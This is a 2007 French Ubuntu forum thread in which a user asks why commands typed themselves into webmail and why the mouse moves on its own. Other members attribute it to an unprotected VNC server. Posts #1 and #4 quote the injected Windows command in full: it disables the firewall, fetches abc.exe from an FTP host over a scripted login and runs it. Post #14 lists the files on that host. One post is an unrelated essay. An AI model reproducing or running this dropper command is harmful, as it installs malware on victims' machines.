#1 Le 18/03/2007, à 15:48
- bloblux
truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Bonjour,
Il s'est passer un truc étrange tout à l'heure... J'était entrain d'écrire un mail sous hotmail est mon curseur c'est mis a écrire des trucs tout seul .... c'est bisard, non ? Voilà ce que ca a écrit :
%systemroot%_system32_cmd.exe
cmd /c net stop SharedAccess &echo open 86.71.11R4.249 642 e>
>T%systemroot%_system32_cmd.exe
cmd /c echo open ftpz.redirectme.net 21 >> ik &echo user jas jas >nary >> ik &echo get abc.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &abc.exe &exit
J'ai rien compris ca veut dire quoi ? c'est quoi ? Est ce que quelqu'un peu m'expliquer ?
Merci beaucoup
Dernière modification par bloblux (Le 19/03/2007, à 22:29)
Hors ligne
#2 Le 18/03/2007, à 15:54
- Gari
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
A vue de nez, je dirai une tentative de faire exécuter du code Windows. Surement un virux. Par contre, le fait que ça arrive sous Ubuntu ça me laisse perplexe.
Hors ligne
#3 Le 18/03/2007, à 16:05
- bloblux
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Ben oui moi aussi, mais pourtant mon pc est entierement sous Ubuntu.... Si c'est un virus windows, je ne risque rien ? c'est bien ca ? Mais si c'est un virus qui fonction sous Ubuntu, je risque quoi ? Je doit malarté, faire un truc ? Vous en pensez quoi ?
Hors ligne
#4 Le 18/03/2007, à 16:37
- Compte anonymisé
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
%systemroot%_system32_cmd.exe
cmd /c net stop SharedAccess &echo open 86.71.11R4.249 642 e>
>T%systemroot%_system32_cmd.exe
cmd /c echo open ftpz.redirectme.net 21 >> ik &echo user jas jas >nary >> ik &echo get abc.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &abc.exe &exit
C'est des commandes MS-Dos
Vu que les commandes MS-Dos ne peuvent être utilisé que sous Windows, je pense que t'a installé un virus windows en utilisant wine ou un logiciel du style.
Si c'est un virus windows, je ne risque rien ? c'est bien ca ?
Ben théoriquement non
alors si c'est sa, normallement un :
killall wineserver
devrais réglé le problème
a+
#5 Le 18/03/2007, à 17:12
- K3g3rUn3kU
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
enorme
non a part via wine tu risque rien
parce que avec wine je me souviens qu'une fois un gars avait attrapé Win32.Klez32MM
avec une disquette donc mefie toi wine c a double tranchant : tu as le beurre mais aussi le rance du beurre (et oui windows c'est du beurre rance)
- Why drink and drive when you can smoke and fly ?
- Chut SAI MAL CA !!!
<BePower> ADSL = pas marcher = la flemme d'aller jusquau modem = disjoncteur plus pret = reboot maison
BASH FR
Hors ligne
#6 Le 18/03/2007, à 17:14
- bloblux
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Ok mais je fait comment exactement pour faire un :
killall wineserver ?
Je suis un peu nule en informatique....
Merci
Nb : Sinon je ne me rapelle pas avoir utiliser un truc wine mais bon.... j'ai pas mal d'amis qui se servent de mon pc alors peut être.....
D'ailleur excuser ma question de débutante mais c'est quoi wine ?
Dernière modification par bloblux (Le 18/03/2007, à 17:25)
Hors ligne
#7 Le 18/03/2007, à 17:37
- Hedj-our
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
En tapant cela dans un terminal
Application =>Accessoir=> terminal
Re-nouveau sous nux mais libre depuis un moment:-)
Re-Passé sous l'O-S du Grand MAL longtemps mais quitté pour le lynx
Ils domineront le monde... (faute de pouvoir placer l'image voici le lien)
Hors ligne
#8 Le 18/03/2007, à 17:47
- bloblux
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Ok, je l'ai fait mais il me répond :
wineserver: aucun processus tué
Ca veut dire quoi qui y a rien de win dans mon pc ou qu'il arrive pas à le tuer ?
Hors ligne
#9 Le 18/03/2007, à 18:37
- tylhdar
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
tu n'est pas le seul
edit: sinon ça pourrait très bien être un un code javascripts contenu dans un mail qui a taper ces lignes, donc aucun danger...
Dernière modification par tylhdar (Le 18/03/2007, à 19:13)
un matériel non compatible linux est un matériel défectueux
ubuntu 10.4 sur pc1 ; debian squeeze sur pc2
Hors ligne
#10 Le 18/03/2007, à 21:04
- bloblux
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
j'ai regarder le lien et ça à l'aire de ressembler à ca... même si j'ai pas tout compris vue que c'est en anglais !!! .... merci tylhdar
Alors je met un résolu devent mon poste ?
Dernière modification par bloblux (Le 18/03/2007, à 21:06)
Hors ligne
#11 Le 19/03/2007, à 19:32
- bloblux
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Bon on va dire que c'est résolu ou du moin que je sais d'ou ca vient mais ça continu et sa à l'aire de plus en plus fréquent !
Si quelqu'un à une idée pour que cela cesse.... Je suis prennante....
Je vai laissé le topic encore ouvert pour aujourd'hui des fois que....
Hors ligne
#12 Le 19/03/2007, à 21:24
- Shirow
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Pôvre virus, zêtes pas sympa avec lui ...
Mieux vaut être bourré que con, ça dure moins longtemps.
Hors ligne
#13 Le 19/03/2007, à 22:27
- bloblux
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Bon alors là c'est la panic voilà que le curseur de la souris si met aussi.... il bouge tout seul et fait même des commandes .... Qu'est ce que ca veux dire ??? Quelqu'un peut il prendre possétion de mon ordi a distance ??? Ou est ce un virus ??? Quelqu'un a une idée sur ce que je peut faire ?
Hors ligne
#14 Le 19/03/2007, à 22:36
- hunterfett
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Hello,
Bon, après une petite visite sur le site ftp qui héberge ce cheval de troie, voilà ce que l'on trouve :
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-r--r--r-- 1 jas www 52224 Mar 17 19:42 abc.exe
-r--r--r-- 1 jas www 52224 Mar 17 19:42 cba.exe
drwxr-xr-x 3 jas www 4096 Mar 17 19:43 honeybot
226 Transfer complete.
Il y a bien un fichier cba.exe qui doit être téléchargé et exécuté sur le PC. Mais le script étant composé de commandes MS-DOS, il ne doit pas y avoir de risque sous Linux.
A+
Amilo Xa 1526 - Gutsy - WIFI SIS163U
Sempron 2800+ Nvidia FX5200 - Gutsy
TNT : Siemens Gigaset M740AV (sous Linux) connecté au NAS
NAS : Linksys NSLU2 (Unslung) 2x250 Go + 500 Go
Hors ligne
#15 Le 19/03/2007, à 22:42
- Compte anonymisé
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
peut-être as tu démarre un serveur style vnc?
peut-être a tu installé un logiciel venait d'un site peu connu avant que tu commence a avoir tes problèmes?
Les problèmes vienne aussi quand tu n'est pas connecté a internet? (comme sa tu sais si c'est un virus ou un gars qui esssaye de prendre possésion de ton ordi)
#16 Le 21/03/2007, à 14:33
- tylhdar
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
reformate tout
(c'est juste ce que je ferait a ta place...)
Dernière modification par tylhdar (Le 21/03/2007, à 14:33)
un matériel non compatible linux est un matériel défectueux
ubuntu 10.4 sur pc1 ; debian squeeze sur pc2
Hors ligne
#17 Le 22/03/2007, à 00:56
- $ianur391
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
la drogue c'est pas bon
tylhdar A ECRIT
reformate tout
(c'est juste ce que je ferait a ta place...)
moi aussi rien de drole jamais drole quand il faut reformater
Enfin retrouvé mon Compte xD
Hors ligne
#18 Le 27/03/2007, à 17:12
- ba
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
La cause: tu as un serveur VNC sur ta machine non protégé par mot de passe.
Supprimes ce service VNC, mets un mot de passe, met un firewall, mais fais quelquechose, quoi!
ce virus circule depuis pas mal de temps quand meme, faudrait faire gaffe un peu, quoi!
#19 Le 27/03/2007, à 20:41
- Johnny1989
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
La bague Atlante est un bijoux ayant suposément des facultés protectrices. Elle aurait aussi la faculté d'améliorer l'état général de la santé et de favoriser les contacts métaphysiques. Ses soidisants pouvoirs varieraient selon la main et le doigt où elle est portée.
Pour prouver l'efficasité de la bague l'auteur du texte sur la bague atlante utilise un lien causal douteu disant qu'après la découverte de la chambre mortuaire du pharaon Tout Ankh Amon, 17 ou 18 personnes (selon les versions) trépassèrent dans les jours et mois qui suivirent. Et le seul de l'équipe qui échappa à la malédiction serait
Howard Carter, celui qui mena les fouilles du début jusqu'à la fin, inventoria et déménagea le trésor trouvé, se serait aussi lui le premié à avoir entré dans la chambre du pharaon et à voir la momie. Il aurait été sauvé à cause d'un talisman qui le protégeait, la bague atlante. L'auteur dit que si Howard Carter aurait été sauvé de la soidisant malédiction ce serait à cause qu'il portait un talisman qui le protégeait. L'auteur ne peut prouver la corrélation entre les deux phénomènes. Pourquoi est-ce que c'est sa bague qui l'aurait protégé de la malédiction, s'il y avait vraiment malédiction? Ce ne pourrait pas être à cause d'une formule magique qu'il aurait prononcé ou d'un porte bonheur qu'il portait à ce moment?
Pour prouver que la bague atlante fonctionne, l'auteur du texte utilise aussi un appel à la tradition disant que les pouvoirs des ondes de forme qui s'en dégagent étaient connus et utilisés en Égypte il y a plus de 5 000 ans. Le simple fait que l'utilisation de la bague atlante se fait depuis 5 000 ans prouverait son fonctionnement. Ce n'est pas parce cette croyance est ancienne qu'elle est vraie. Pendant combien de temps avons-nous cru que la terre était plate et est-ce que c'était vrai?
Hors ligne
#20 Le 27/03/2007, à 20:46
- sonal
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
donc tu penses qu'il existe des "virus" actifs contre linux ?
Sonal
Patience et longueur de temps, font plus que force, ni que rage
Hors ligne
#21 Le 29/03/2007, à 11:07
- cheos
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
Je dirais plutôt que si on laisse un service d'accès à distance ouvert aux quatre vents, on prend le risque de voir une personne mal intentionnée ou un programme venir tenter de fouiller la machine.
Hors ligne
#22 Le 06/11/2007, à 14:27
- Tatane_ESIEE
Re : truc bizar -ca écrit tout seul! et maintenant la souris s'y met aussi
bonjour a tous, j'ai eu vraisemblablement le même probleme que vous, un mec est passé ( au vu des logs impréssionnants de tentatives ssh ) par mon ssh qui pourtant ( du moins je le pense ) est configuré correctement et a tapé les commandes citées plus hauts. Cepandant ces commandes se sont tapées dans un tableur ( lol ). J'ai fait un check avec chkrootkit et j'ai configuré iptables .
PS voici les addresses d'ou il a tenté de se connecté en testant des nom d'utilisateurs administrateurs par defaults et a réussi a rentrer avec le compte "nobody":
Nov 2 14:06:04 220.248.40.13
Nov 2 22:09:26 60.28.222.154
Nov 4 13:08:33 61.27.104.2
Nov 4 20:52:04 70.46.119.34
je ne sait pas trop a quoi correspond ce compte, j'ai changé mes mots de passes, si vous en savez plus dites moi.
Tatane